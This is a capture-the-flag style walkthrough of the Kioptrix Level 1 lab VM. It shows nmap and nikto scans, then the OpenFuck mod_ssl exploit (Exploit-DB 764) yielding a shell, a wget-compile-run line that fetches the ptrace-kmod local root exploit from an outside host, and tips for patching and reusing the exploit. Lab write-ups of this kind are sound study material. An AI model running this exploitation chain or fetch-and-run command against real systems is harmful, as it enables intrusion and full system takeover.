Kioptrix Level 1

Information gathering

nmap

root@kali:~# nmap -p 0-65535 192.168.1.104
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-06 21:53 PST
Nmap scan report for 192.168.1.104
Host is up (0.00012s latency).
Not shown: 65530 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
443/tcp  open  https
1024/tcp open  kdm
MAC Address: 00:0C:29:7C:3A:16 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.13 seconds
root@kali:~# nmap -V -p 0-65535 192.168.1.104
Nmap version 7.80 ( https://nmap.org )
Platform: x86_64-pc-linux-gnu
Compiled with: liblua-5.3.3 openssl-1.1.1d libssh2-1.8.0 libz-1.2.11 libpcre-8.39 nmap-libpcap-1.7.3 nmap-libdnet-1.12 ipv6
Compiled without:
Available nsock engines: epoll poll select
root@kali:~# nmap -vv -p 0-65535 192.168.1.104
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-06 21:53 PST
Initiating ARP Ping Scan at 21:53
Scanning 192.168.1.104 [1 port]
Completed ARP Ping Scan at 21:53, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:53
Completed Parallel DNS resolution of 1 host. at 21:53, 0.00s elapsed
Initiating SYN Stealth Scan at 21:53
Scanning 192.168.1.104 [65536 ports]
Discovered open port 443/tcp on 192.168.1.104
Discovered open port 22/tcp on 192.168.1.104
Discovered open port 80/tcp on 192.168.1.104
Discovered open port 111/tcp on 192.168.1.104
Discovered open port 139/tcp on 192.168.1.104
Discovered open port 1024/tcp on 192.168.1.104
Completed SYN Stealth Scan at 21:53, 3.07s elapsed (65536 total ports)
Nmap scan report for 192.168.1.104
Host is up, received arp-response (0.00012s latency).
Scanned at 2019-12-06 21:53:24 PST for 3s
Not shown: 65530 closed ports
Reason: 65530 resets
PORT     STATE SERVICE     REASON
22/tcp   open  ssh         syn-ack ttl 64
80/tcp   open  http        syn-ack ttl 64
111/tcp  open  rpcbind     syn-ack ttl 64
139/tcp  open  netbios-ssn syn-ack ttl 64
443/tcp  open  https       syn-ack ttl 64
1024/tcp open  kdm         syn-ack ttl 64
MAC Address: 00:0C:29:7C:3A:16 (VMware)

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 3.21 seconds
           Raw packets sent: 65537 (2.884MB) | Rcvd: 65540 (2.622MB)


Nikto Check

root@kali:~# nikto -h 192.168.1.104
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.104
+ Target Hostname:    192.168.1.104
+ Target Port:        80
+ Start Time:         2019-12-06 21:54:11 (GMT-8)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server may leak inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Wed Sep  5 20:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.1.1). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS).
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting...
+ /wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /assets/mobirise/css/meta.php?filesrc=: A PHP backdoor file manager was found.
+ /login.cgi?cli=aa%20aa%27cat%20/etc/hosts: Some D-Link router remote command execution.
+ /shell?cat+/etc/hosts: A backdoor was identified.
+ 8724 requests: 0 error(s) and 30 item(s) reported on remote host
+ End Time:           2019-12-06 21:54:23 (GMT-8) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


Attack

root@kali:/usr/share/exploitdb/exploits/unix/remote# ./764 0x6b 192.168.1.104

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f8068
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ 
wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p;
--03:14:30--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]

    0K ...                                                   100% @   1.87 MB/s

03:14:32 (1.25 MB/s) - `ptrace-kmod.c' saved [3921/3921]

[-] Unable to attach: Operation not permitted
bash: [937: 1] tcsetattr: Invalid argument
bash-2.05$ 
bash-2.05$ ifconfig
ifconfig
bash: ifconfig: command not found
bash-2.05$ /sbin/ifconfig
/sbin/ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0C:29:7C:3A:16  
          inet addr:192.168.1.104  Bcast:192.168.1.255  Mask:255.255.255.0
          UP BROADCAST NOTRAILERS RUNNING  MTU:1500  Metric:1
          RX packets:133 errors:0 dropped:0 overruns:0 frame:0
          TX packets:146 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100 
          RX bytes:23878 (23.3 Kb)  TX bytes:16669 (16.2 Kb)
          Interrupt:11 Base address:0x2000 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:6 errors:0 dropped:0 overruns:0 frame:0
          TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:420 (420.0 b)  TX bytes:420 (420.0 b)

bash-2.05$ 
whoami
root
The exploit used above is Exploit-DB 764 (OpenFuck). A copy can be downloaded from https://github.com/TapXWorld/forOSCP/tree/master/Kioptrix%20Level%201 and compiled with "gcc 764.c -o 764 -lcrypto". The stock Exploit-DB copy does not build on a current Kali without edits (the OpenSSL development headers must be installed, the openssl/rc4.h and openssl/md5.h includes added, and the ptrace-kmod.c download URL replaced with a working one), so use a patched copy. The 0x6b argument selects the RedHat 7.2 / apache-1.3.20-16 entry from the target list the exploit prints when run without arguments. Two points to keep in mind when reusing it: the initial shell runs with the web server's privileges, and the root shell comes from the exploit's built-in post-exploitation command, which makes the target fetch ptrace-kmod.c (the Linux 2.4 ptrace/kmod local root, CVE-2003-0127) from dl.packetstormsecurity.net, compile it and run it. In a lab with no outbound access that download fails, and ptrace-kmod.c has to be served from the attacking host instead.
